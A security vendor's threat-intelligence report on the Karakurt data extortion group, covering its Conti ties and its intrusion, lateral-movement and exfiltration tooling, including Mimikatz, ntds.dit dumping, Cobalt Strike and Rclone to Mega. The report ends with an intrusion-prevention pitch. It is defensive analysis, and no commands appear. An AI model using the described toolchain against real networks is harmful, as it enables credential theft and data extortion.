This month, the Cybersecurity and Infrastructure Agency (CISA) issued a warning about a data extortion group called Karakurt. The threat actor is also known as Karakurt Team and Karakurt Lair, and although most media outlets are reporting the group as “new”, Karakurt has actually been active since 2021.
Karakurt has a variety of tactics, techniques, and procedures that make it difficult for defense and mitigation. They also skip the encryption process on compromised machines and files, and go straight for the extraction of data – holding the data until they receive their ransom payment. So far, the group has had victims in North America and Europe, and they have published several press releases or announcements shaming victims who haven’t cooperated. Let’s take a detailed look at Karakurt and why securing backups may not be enough to stop data extortion groups
As we stated previously, even though Karakurt has been called a new data extortion group, the group has been active since June 2021. In September 2021, Accenture Security observed Karakurt intrusion clusters, as well as multiple sightings within a short timeframe. At that time, Karakurt impacted over 40 victims and was specifically targeting small companies or corporate subsidiaries as opposed to large corporations.
Additionally, Karakurt focuses on attacking organization’s that have already been compromised, obtaining data via a third-party intrusion broker or through stolen login credentials. After they obtain the data, they threaten to release it on their website that’s only accessible through the dark web. If victims don’t comply, they shame them publicly on the site by releasing sensitive data.
In December 2021, Karakurt claimed they had data from 40 victims between September and November of 2021. The names of the victims are not public. Karakurt promises to delete stolen data after payment is made but some victims reported that the threat actors didn’t keep their promise.
Karakurt (which means black wolf in Turkish) is believed to be an arm of or in alliance with the ransomware group, Conti. If you recall, Avertium’s Cyber Threat Intelligence team mentioned Karakurt in a Threat Intelligence Report featuring Black Basta ransomware.
According to our partners, AdvIntel, Conti is currently rebranding as multiple ransomware groups and that the brand, not the organization, is shutting down. On May 19, 2022, Conti’s official website went offline, as well as their negotiations service site. Conti’s infrastructure (chat rooms, servers, proxy hosts, etc.) went through a massive reset.
The publicity function of Conti’s blog is still active, but the operational function of “Conti News” (used to upload new data to force victims to pay) is defunct – including infrastructure related to data uploads, negotiations, and the hosting of stolen data. AdvIntel believes that Conti can no longer support and obtain extortion and that the shutdown was not spontaneous but calculated. May 19, 2022 is Conti’s official date of death with their attack on Costa Rica being their final dance.
The attack on Costa Rica, which forced the country to declare a state of emergency, was Conti’s way of keeping the illusion that they were still active and diverting everyone’s attention, while working on their restructuring. During the diversion tactics, Conti’s extension groups such as Karakurt were actively and silently attacking organizations.
Researchers observed that there was some overlap between some of Karakurt’s attacks and Conti’s attacks. The two groups use some of the same tools for exfiltration and leave behind a file listing of exfiltrated data (file-tree.txt) in their victim’s environment. When remotely accessing victims’ networks, both groups use the same attacker host name.
Image 1: Conti Compared to Karakurt
n addition to using some of the same tools, Karakurt was observed sending large sums of cryptocurrency to Conti wallets. Chainanalysis, a blockchain analysis team, observed Karakurt moving 11.6 Bitcoin ($472,000) into a Conti wallet. They also observed several Karakurt victim payment addresses hosted by wallets that house Conti victim payment addresses.
Karakurt’s initial access method is primarily via internet-facing systems on virtual private networks (VPN) using legitimate credentials. There isn’t enough forensic evidence to determine how they obtain the credentials, but one possibility is through the exploitation of vulnerable VPN devices. All observed cases of those devices included inconsistent or absent use of multi-factor authentication for user accounts.
According to Accenture Security, Karakurt uses credentials, service creation, remote management software, and distribution of C2 beacons via Cobalt Strike to further their foothold and maintain persistence. Recently, the threat actors didn’t deploy backup persistence by using Cobalt, but instead used the VPN IP pool or AnyDesk to allow external remote access to compromised devices.
To move laterally in a system, Karakurt leverages previously obtained user, service, and administrator credentials. They also leverage Mimikatz in at least one intrusion set, and leverage PowerShell to dump ntds.dit and exfiltrate it. Karakurt uses these techniques and tools to escalate privileges on an as needed basis.
Karakurt evades defenses by using pre-existing tools and techniques, as well as remote management software. Accenture Security noted that Karakurt avoids using common post-exploitation tools or commodity malware in favor of credential access. The approach allows the threat actor to evade detection and bypass security tools, such as EDR solutions.
If the previously mentioned tools aren’t already on their victims’ networks, the group downloads common remote management and file transfer utilities to support later exfiltration (AnyDesk, 7zip, etc.). WinZip and 7zip are using for compression, while Rclone or FileZilla (SFTP) is used for staging and final exfiltration to Mega.io cloud storage.
When it comes to data extortion, backups are still important, but they won’t be enough to keep your organization from losing valuable data to Karakurt. As we stated before, Karakurt is bypassing file encryption and is focusing on data exfiltration instead. This means that your security focus should be based on keeping threat actors out of your systems and networks.
Of course, backups are necessary and there will never be a time when they are not needed, but when a data extortion group like Karakurt blackmails your organization by threatening to leak sensitive data, backups mean little to nothing. Focusing on keeping intruders out of your cyber environment in the first place will give you more leverage over data extortion groups. Implementing an intrusion prevention system (IPS) is a cyber security best practice that will help keep your organization safe.
An IPS is an intrusion prevention system that offers protection for networks by detecting and preventing threats. The system constantly monitors the network for intrusion prevention mechanisms and also checks for potential malicious events. Once incidents are found, the IPS reports those incidents to system administrators and takes measures to prevent possible attacks. How does an IPS prevent attacks from succeeding? The IPS prevents attacks by using different response strategies including altering the security environment, stopping an attack itself, or altering the content of an attack.
The IPS operates by scanning traffic on a network, avoiding different risks such as:
Also, the IPS inspects any packet that passes through a network via real-time packet inspection. If a potential threat is observed, the IPS does one of the following:
If your organization implements an IPS strategy, there will be several benefits, including:
Karakurt is the second data extortion group Avertium has covered in a short span of time. The first data extortion group that made headlines was Lapsus$. Avertium became aware of the data extortion gang Lapsus$ after they breached authentication company, Okta Inc. However, Okta Inc. was not the only organization that became a victim of Lapsus$. In March 2022, Lapsus$ breached Globant and then breached T-Mobile in April 2022, stealing the company’s source code. Lapsus$ also breached Microsoft, Samsung, Ubisoft, and Nvidia.
Like Karakurt, Lapsus$ focused heavily on data extortion, gaining initial access to networks by compromising personal or private accounts. This gave them access to look for additional credentials – ultimately giving them access to corporate systems. After gaining access to their targeted network, Lapsus$ exploits unpatched vulnerabilities on internally accessible servers. The threat actors also finds exposed credentials by searching code repositories and collaboration platforms.
Once Lapsus$ obtains the information they need, they threated to leak the information if they aren’t paid a ransom. Lapsus$ has made an estimated $14 million in Bitcoin. As you can see, data extortion is not a new idea, but it may become a new trend amongst threat actors. Cutting out file encryption and holding data ransom has more of an impact when trying to extort organizations. Threat actors know that most would be willing to pay if there is a risk of sensitive data being leaked, making backups useless.
Even with anti-malware solutions installed, Karakurt is a great risk to organizations. Karakurt can go undetected by EDR, making organizations everywhere vulnerable to an attack. However, Avertium has advanced services that can help keep your organization safe:
This document and its contents do not constitute, and are not a substitute for, legal advice. The outcome of a Security Risk Assessment should be utilized to ensure that diligent measures are taken to lower the risk of potential weaknesses be exploited to compromise data.
Although the Services and this report may provide data that Client can use in its compliance efforts, Client (not Avertium) is ultimately responsible for assessing and meeting Client's own compliance responsibilities. This report does not constitute a guarantee or assurance of Client's compliance with any law, regulation or standard.
COPYRIGHT: Copyright © Avertium, LLC and/or Avertium Tennessee, Inc. | All rights reserved.